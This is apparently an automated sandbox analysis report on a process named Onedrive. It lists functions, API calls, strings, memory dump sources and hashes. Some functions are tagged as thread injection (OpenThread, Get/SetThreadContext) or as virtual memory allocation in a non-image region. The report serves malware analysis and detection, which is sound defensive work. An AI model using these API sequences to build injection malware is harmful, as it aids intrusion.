RoInitialize.API-MS-WIN-CORE-WINRT-L1-1-0 ref: 00007FF6104F159E
CommandLineToArgvW.SHELL32 ref: 00007FF6104F15D0
GetLastError.KERNEL32 ref: 00007FF6104F15E4
ChangeWindowMessageFilter.USER32 ref: 00007FF6104F1636
TranslateMessage.USER32 ref: 00007FF6104F16A1
DispatchMessageW.USER32 ref: 00007FF6104F16B1
GetMessageW.USER32 ref: 00007FF6104F16C9
RoUninitialize.API-MS-WIN-CORE-WINRT-L1-1-0 ref: 00007FF6104F16E3
EventUnregister.ADVAPI32 ref: 00007FF6104F175B
SLClose.SLC ref: 00007FF6104F1777
CloseHandle.KERNEL32 ref: 00007FF6104F17DF
UnregisterWaitEx.KERNEL32 ref: 00007FF6104F17FF
UnregisterWaitEx.KERNEL32 ref: 00007FF6104F181B
CloseHandle.KERNEL32 ref: 00007FF6104F1834
CloseHandle.KERNEL32 ref: 00007FF6104F184D
LocalFree.KERNEL32 ref: 00007FF6104F1865

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: Event$CloseMessage$HandleUnregister$RegisterWait$ActivityArgvChangeCommandControlCurrentDefaultDispatchErrorFilterFreeInformationInitializeInstalledLastLineLocalOpenProductTranslateUninitializeWindow
String ID:
API String ID: 4262568299-0
Opcode ID: 057ad605cfa734ea69936c5c81ee5022b13314d1383440f342be20a475843f21
Instruction ID: 3ab7cc0c5644bf2a8cfbca38bbc3462b3fcd44b1a5f5c3b608fa6230481a8051
Opcode Fuzzy Hash: 057ad605cfa734ea69936c5c81ee5022b13314d1383440f342be20a475843f21
Instruction Fuzzy Hash: 0CE13831A08E42EAEF109B25E9901BC37A5FF8AFA8B549535D90EC7768CF3CE4558350

Function 00007FF8A031B5A0 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 228
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vcrt_lock.LIBVCRUNTIMED ref: 00007FF8A031B5C5

Part of subcall function 00007FF8A0326620: EnterCriticalSection.KERNEL32(?,?,?,?,00007FF8A0318375,?,?,?,?,00007FF8A0318062), ref: 00007FF8A0326641

HeapAlloc.KERNEL32 ref: 00007FF8A031B7AA
__vcrt_lock.LIBVCRUNTIMED ref: 00007FF8A031B9DE

Strings

Error: memory allocation: bad memory block type., xrefs: 00007FF8A031B753
Client hook allocation failure., xrefs: 00007FF8A031B6AC
Client hook allocation failure at file %hs line %d., xrefs: 00007FF8A031B687

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: __vcrt_lock$AllocCriticalEnterHeapSection
String ID: Client hook allocation failure at file %hs line %d.$Client hook allocation failure.$Error: memory allocation: bad memory block type.
API String ID: 3996555514-2973468218
Opcode ID: b588652198e2ba0bab837f12bb7a4c46ddb51b8bf420c0f2ff2df4b1385cc741
Instruction ID: 0436b4644218b7e537965bbc8e6d2ee2f88a874dd515efcc779e10b4a9839a35
Opcode Fuzzy Hash: b588652198e2ba0bab837f12bb7a4c46ddb51b8bf420c0f2ff2df4b1385cc741
Instruction Fuzzy Hash: 2BC1D936A0EF8699EB608B19E48036A77A0FB897D5F104535DA9D47BA8DF3DE440CB00

Function 0000021BD8F80020 Relevance: 3.3, APIs: 2, Instructions: 262nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 0000021BD8F800EF
NtProtectVirtualMemory.NTDLL ref: 0000021BD8F80237

Memory Dump Source

Source File: 00000003.00000003.2239529457.0000021BD8F80000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021BD8F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_21bd8f80000_Onedrive.jbxd

Similarity

API ID: MemoryVirtual$AllocateProtect
String ID:
API String ID: 2931642484-0
Opcode ID: 670168b2314164816ad4fff62a771d92f35dcb7a52677c9802cb5d6c25b1cd75
Instruction ID: 7453a562f9550636c5be81d4e041a5e1d4a3ad72adfc66e1bf2017f253fd989e
Opcode Fuzzy Hash: 670168b2314164816ad4fff62a771d92f35dcb7a52677c9802cb5d6c25b1cd75
Instruction Fuzzy Hash: 4F712670618A084BE71CAB18F8467AA77F1FBD5711F50463DF98BC3292DB74D8428682

Function 00007FF6104FE530 Relevance: 10.6, APIs: 7, Instructions: 143
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF6104FE558
Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 00007FF6104FE58F
_amsg_exit.MSVCRT ref: 00007FF6104FE5AD
_initterm.MSVCRT ref: 00007FF6104FE638
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF6104FE665
exit.MSVCRT ref: 00007FF6104FE70A
_cexit.MSVCRT ref: 00007FF6104FE719

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: CurrentImageInfoNonwritableSleepStartup_amsg_exit_cexit_inittermexit
String ID:
API String ID: 642454821-0
Opcode ID: dcccb8e6faa13e6eb85182caefda4e784d42338a70b9cfa3f9f0163e6fa78336
Instruction ID: 94cdfe4bdb885364addfa5d7e2c13c985a7cb23b3a93565421e2e8171a26568f
Opcode Fuzzy Hash: dcccb8e6faa13e6eb85182caefda4e784d42338a70b9cfa3f9f0163e6fa78336
Instruction Fuzzy Hash: FA613D21A0DE06E2FF709B1AE68023932A8FB58FA9F540435D94DC7798DF3CE9618701

Function 00007FF8A0330510 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vcrt_lock.LIBVCRUNTIMED ref: 00007FF8A03305CF

Part of subcall function 00007FF8A0326620: EnterCriticalSection.KERNEL32(?,?,?,?,00007FF8A0318375,?,?,?,?,00007FF8A0318062), ref: 00007FF8A0326641

__vcrt_lock.LIBVCRUNTIMED ref: 00007FF8A0330656

Strings

static_cast<unsigned>(fh) < _NHANDLE_, xrefs: 00007FF8A0330543, 00007FF8A03305AC
%ls, xrefs: 00007FF8A033054F
minkernel\crts\ucrt\src\appcrt\lowio\osfinfo.cpp, xrefs: 00007FF8A0330564, 00007FF8A033059E
__acrt_lowio_ensure_fh_exists, xrefs: 00007FF8A03305A5

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: __vcrt_lock$CriticalEnterSection
String ID: %ls$__acrt_lowio_ensure_fh_exists$minkernel\crts\ucrt\src\appcrt\lowio\osfinfo.cpp$static_cast<unsigned>(fh) < _NHANDLE_
API String ID: 3216741998-2342959244
Opcode ID: ae640927d60817160271a2714da284d25e7b7308b8c6acd019e82179aa0bfa48
Instruction ID: 54c72fa1310eb3cab1636b50be2edac481ed5afa95bfcd72f7871be961104c4f
Opcode Fuzzy Hash: ae640927d60817160271a2714da284d25e7b7308b8c6acd019e82179aa0bfa48
Instruction Fuzzy Hash: 92313672A1EE43AAF7109B10E49076A77A0FB84384F502139E68E4B7A9CF3DE454CB01

Function 00007FF8A03015E0 Relevance: 6.1, APIs: 4, Instructions: 110
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenThread.KERNEL32 ref: 00007FF8A0301760
GetThreadContext.KERNEL32 ref: 00007FF8A0301776
SetThreadContext.KERNELBASE ref: 00007FF8A03017A4
CloseHandle.KERNELBASE ref: 00007FF8A03017B7

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: Thread$Context$CloseHandleOpen
String ID:
API String ID: 3699202265-0
Opcode ID: d4c4d1f31c04e89d8440c4e2001154f5e439df317c5423af91eed40023814fc9
Instruction ID: 303a20a4535ff55d38afa8e3f0e5c6f694361cefc80f39cf53d64bec039027fe
Opcode Fuzzy Hash: d4c4d1f31c04e89d8440c4e2001154f5e439df317c5423af91eed40023814fc9
Instruction Fuzzy Hash: C151D532A14BC189E320CF65ED402DDB7FDFBA5388F10531AEA9856EA9DF7491A0C740

Function 00007FF8A03302D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FF8A0330300

Part of subcall function 00007FF8A03039B0: __crt_scoped_stack_ptr.LIBCPMTD ref: 00007FF8A03039BE

Part of subcall function 00007FF8A03085F0: __crt_unique_heap_ptr.LIBCMTD ref: 00007FF8A03085FE

Strings

minkernel\crts\ucrt\src\appcrt\lowio\osfinfo.cpp, xrefs: 00007FF8A03302DC

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: Concurrency::details::_SchedulerScheduler::___crt_scoped_stack_ptr__crt_unique_heap_ptr
String ID: minkernel\crts\ucrt\src\appcrt\lowio\osfinfo.cpp
API String ID: 1054307577-534659383
Opcode ID: bf5abb50213b255653cb25fdc270292517b4292bdca5e9645a15d9283761075a
Instruction ID: 2f9fe802b467e63ff842b4e42c3a56bea65faf201447b1fa2dbc48cb24b2966b
Opcode Fuzzy Hash: bf5abb50213b255653cb25fdc270292517b4292bdca5e9645a15d9283761075a
Instruction Fuzzy Hash: 7D414D2262EB8195DB80CB1AE09136EBB60E7C57D4F542126FBCE47BA6CF7DC5418B01

Function 00007FF8A0301590 Relevance: 3.0, APIs: 2, Instructions: 18
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSection.KERNEL32 ref: 00007FF8A03015A5
AddVectoredExceptionHandler.KERNEL32 ref: 00007FF8A03015B7

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: CriticalExceptionHandlerInitializeSectionVectored
String ID:
API String ID: 1918240263-0
Opcode ID: fb6ecdb09215081dff59cbbde18696c7f37c7dd433215ad7ce397aa92e144a44
Instruction ID: e6af35bf807ac52902eacb24295f33500788fbe22a1c81228975f4ac258fccaa
Opcode Fuzzy Hash: fb6ecdb09215081dff59cbbde18696c7f37c7dd433215ad7ce397aa92e144a44
Instruction Fuzzy Hash: A3E0BFA8E0BE07AAFB089B15EC5537422E5FF58385FC05035D14D56370DF6D65968700

Function 00007FF8A0321190 Relevance: 3.0, APIs: 2, Instructions: 17
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vcrt_lock.LIBVCRUNTIMED ref: 00007FF8A0321199

Part of subcall function 00007FF8A0326620: EnterCriticalSection.KERNEL32(?,?,?,?,00007FF8A0318375,?,?,?,?,00007FF8A0318062), ref: 00007FF8A0326641

__vcrt_lock.LIBVCRUNTIMED ref: 00007FF8A03211C4

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: __vcrt_lock$CriticalEnterSection
String ID:
API String ID: 3216741998-0
Opcode ID: 1eb003dd854b58748907cb2f28eedebdd14ecbd62e688982f457d1efa163928a
Instruction ID: cb4cf3fbf932b02fd07b64f383ac33936b4888ea6c93acdedba695517078de2f
Opcode Fuzzy Hash: 1eb003dd854b58748907cb2f28eedebdd14ecbd62e688982f457d1efa163928a
Instruction Fuzzy Hash: 4CE0EC01D0E9C3A1F7343275911637E2A41EF79388F440279EB8D457C7DE6CF2144A62

Function 00007FF8A0301550 Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteCriticalSection.KERNEL32 ref: 00007FF8A030155B
RemoveVectoredExceptionHandler.KERNEL32 ref: 00007FF8A030156D

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: CriticalDeleteExceptionHandlerRemoveSectionVectored
String ID:
API String ID: 1384964762-0
Opcode ID: 5603965f67bc51f021bb451bf859e20d88480dca11bf105668d04a671e603702
Instruction ID: 7bba5241cf4c1598b26bec6c7fbf86add5eebdab6ebfe8e51b8187148a1570af
Opcode Fuzzy Hash: 5603965f67bc51f021bb451bf859e20d88480dca11bf105668d04a671e603702
Instruction Fuzzy Hash: 48D06798F1BD03AAFA589FA19C9127122A4EF94791FD44430C90EA9360DE9DE59B9700

Function 00007FF8A0301860 Relevance: 1.6, APIs: 1, Instructions: 69
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF8A030192F

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: d8a67680f0db511946e090e78dcfaad3c4524fee8cf677f73070562d12118055
Instruction ID: e4c61cb12cac1797abd707496bf9b8f3e3408d0fc1d5efe858001bd84e51350e
Opcode Fuzzy Hash: d8a67680f0db511946e090e78dcfaad3c4524fee8cf677f73070562d12118055
Instruction Fuzzy Hash: A2219D25A0FB03A5F6508FD6A48017A63A0FF84BC4F688235EF5D83794DF7CE5418640

Function 00007FF8A031B500 Relevance: 1.5, APIs: 1, Instructions: 41
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_purecall_handler.LIBVCRUNTIMED ref: 00007FF8A031B517

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: _get_purecall_handler
String ID:
API String ID: 2826984366-0
Opcode ID: ad07be3e6c2b22536b3f255321fe498e304bc87f9b5340cb5d734495a9b1ccba
Instruction ID: 158c9f8bf6ec8556b01a516a5c0a5c992da455ecf4e6e9539da9b12975072e05
Opcode Fuzzy Hash: ad07be3e6c2b22536b3f255321fe498e304bc87f9b5340cb5d734495a9b1ccba
Instruction Fuzzy Hash: 0B11286291EB8396EB209B51B04036EBBA1EB9E3C9F040135FACD42B99DF6CD540CB10

Function 00007FF6104FE4E0 Relevance: 1.5, APIs: 1, Instructions: 13
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__wgetmainargs.KERNELBASE ref: 00007FF6104FE518

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: __wgetmainargs
String ID:
API String ID: 1709950718-0
Opcode ID: 7b8df0f035fed5510aa95a0b9caed67fb4fa6e53af1179eb02ea095a1f50ed61
Instruction ID: 4e33b8fe8640014678feac2880d08049ac6bc91e3f5cab85a1d6bc68bc0dac67
Opcode Fuzzy Hash: 7b8df0f035fed5510aa95a0b9caed67fb4fa6e53af1179eb02ea095a1f50ed61
Instruction Fuzzy Hash: F6E07574E0DF43E6EE108B50EA454A937A0BB1DB6CBA04036D80CD3339DE3CA159CB20

Function 00007FF8A0302039 Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__security_init_cookie.LIBCMTD ref: 00007FF8A0302039

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: __security_init_cookie
String ID:
API String ID: 1916132197-0
Opcode ID: 1ea7b90c7907bc48940007c29d94137a28260e46411c2c610252b12d6915dafa
Instruction ID: 1e3c162a2e59da6ae959d78d6b6db99994d364ca1d1987eb9fd7a07bc09cea11
Opcode Fuzzy Hash: 1ea7b90c7907bc48940007c29d94137a28260e46411c2c610252b12d6915dafa
Instruction Fuzzy Hash: D9C08C3A92B98283C200AB51E04149E6320FBC97C0F602121FB4E0370A8D2CD4048A40

Non-executed Functions

Function 00007FF6104F892C Relevance: 45.7, APIs: 23, Strings: 3, Instructions: 218threadCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF6104F8990
memset.MSVCRT ref: 00007FF6104F89A1
CloseHandle.KERNEL32 ref: 00007FF6104F89BF
GetWindowThreadProcessId.USER32 ref: 00007FF6104F89E1
GetLastError.KERNEL32 ref: 00007FF6104F89F1

Strings

A0BB30C7-DEC2-4BFD-AF5F-DC6612D74584, xrefs: 00007FF6104F8AD9, 00007FF6104F8B10
2F8FA37B-8158-476F-9B22-3283D2A6FEC2, xrefs: 00007FF6104F8A88
%windir%\ImmersiveControlPanel\SystemSettings.exe, xrefs: 00007FF6104F8BD3

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: memset$CloseErrorHandleLastProcessThreadWindow
String ID: %windir%\ImmersiveControlPanel\SystemSettings.exe$2F8FA37B-8158-476F-9B22-3283D2A6FEC2$A0BB30C7-DEC2-4BFD-AF5F-DC6612D74584
API String ID: 3504613239-2751644673
Opcode ID: 4b6fd73fe6a43ca1d551fd65e3bdd0a8ed6c5294c22ee6cbe672d89829c46d4f
Instruction ID: fd8c1f13956dba21a3d3731add509ea18e51f6f572a03af6cea0e937e5c2aa62
Opcode Fuzzy Hash: 4b6fd73fe6a43ca1d551fd65e3bdd0a8ed6c5294c22ee6cbe672d89829c46d4f
Instruction Fuzzy Hash: BAA14D32A08E52D6FF249B25A85027DB6A4FF89FA4F448239DA4EC7794DF3CE5148701

Function 00007FF6104F1F10 Relevance: 31.6, APIs: 3, Strings: 15, Instructions: 134COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6104F66D4: CoTaskMemFree.API-MS-WIN-CORE-COM-L1-1-0 ref: 00007FF6104F675E

StrToID.DUI70 ref: 00007FF6104F2111
?FindDescendent@Element@DirectUI@@QEAAPEAV12@G@Z.DUI70 ref: 00007FF6104F2123
?AddListener@Element@DirectUI@@QEAAJPEAUIElementListener@2@@Z.DUI70 ref: 00007FF6104F213F

Strings

Number9, xrefs: 00007FF6104F20C8
Number7, xrefs: 00007FF6104F2082
TollMain, xrefs: 00007FF6104F1F6A
IIDText, xrefs: 00007FF6104F1F8D
CallNumber, xrefs: 00007FF6104F2152
Number2, xrefs: 00007FF6104F1FD3
Number6, xrefs: 00007FF6104F205F
PrivacyLink, xrefs: 00007FF6104F20EB, 00007FF6104F210A
Number4, xrefs: 00007FF6104F2019
Number3, xrefs: 00007FF6104F1FF6
Number5, xrefs: 00007FF6104F203C
TollFree, xrefs: 00007FF6104F1F47
Instructions, xrefs: 00007FF6104F1F1D
Number8, xrefs: 00007FF6104F20A5
Number1, xrefs: 00007FF6104F1FB0

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: DirectElement@$Descendent@ElementFindFreeListener@Listener@2@@TaskV12@
String ID: CallNumber$IIDText$Instructions$Number1$Number2$Number3$Number4$Number5$Number6$Number7$Number8$Number9$PrivacyLink$TollFree$TollMain
API String ID: 4084670624-4122676257
Opcode ID: de347effb7d31f4abd0a984043735bca1e7089a22e8b78f18e1b4c452233c240
Instruction ID: 837037ac15d57718cd18c232cc780ffa80da7c5db9c170f7ec410f1b8e6d0c4b
Opcode Fuzzy Hash: de347effb7d31f4abd0a984043735bca1e7089a22e8b78f18e1b4c452233c240
Instruction Fuzzy Hash: 10511B60B0CF57E2FE149B6ADA901791698AF4DFA8F005031CA0DCB35ADE6DF528C711

Function 00007FF8A031BDC0 Relevance: 26.7, APIs: 2, Strings: 13, Instructions: 461COMMONLIBRARYCODE

Download Yara Rule

APIs

new[].LIBCMTD ref: 00007FF8A031BE14

Strings

Error: possible heap corruption at or near 0x%p, xrefs: 00007FF8A031C185
The Block at 0x%p was allocated by aligned routines, use _aligned_realloc(), xrefs: 00007FF8A031C053
minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp, xrefs: 00007FF8A031C0BD, 00007FF8A031C14B, 00007FF8A031C470, 00007FF8A031C4F9, 00007FF8A031C573
Client hook re-allocation failure at file %hs line %d., xrefs: 00007FF8A031BF24
_CrtIsValidHeapPointer(block), xrefs: 00007FF8A031C09C
__acrt_last_block == old_head, xrefs: 00007FF8A031C4D8
%ls, xrefs: 00007FF8A031C0A8, 00007FF8A031C136, 00007FF8A031C45B, 00007FF8A031C4E4, 00007FF8A031C55E
reallocation_is_allowed || (!reallocation_is_allowed && new_head == old_head), xrefs: 00007FF8A031C44F
Error: memory allocation: bad memory block type., xrefs: 00007FF8A031BFFE
Client hook re-allocation failure., xrefs: 00007FF8A031BF49
Error: memory allocation: bad memory block type.Memory allocated at %hs(%d)., xrefs: 00007FF8A031BFD6
__acrt_first_block == old_head, xrefs: 00007FF8A031C552
old_head->_line_number == line_number_for_ignore_blocks && old_head->_request_number == request_number_for_ignore_blocks, xrefs: 00007FF8A031C12A

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
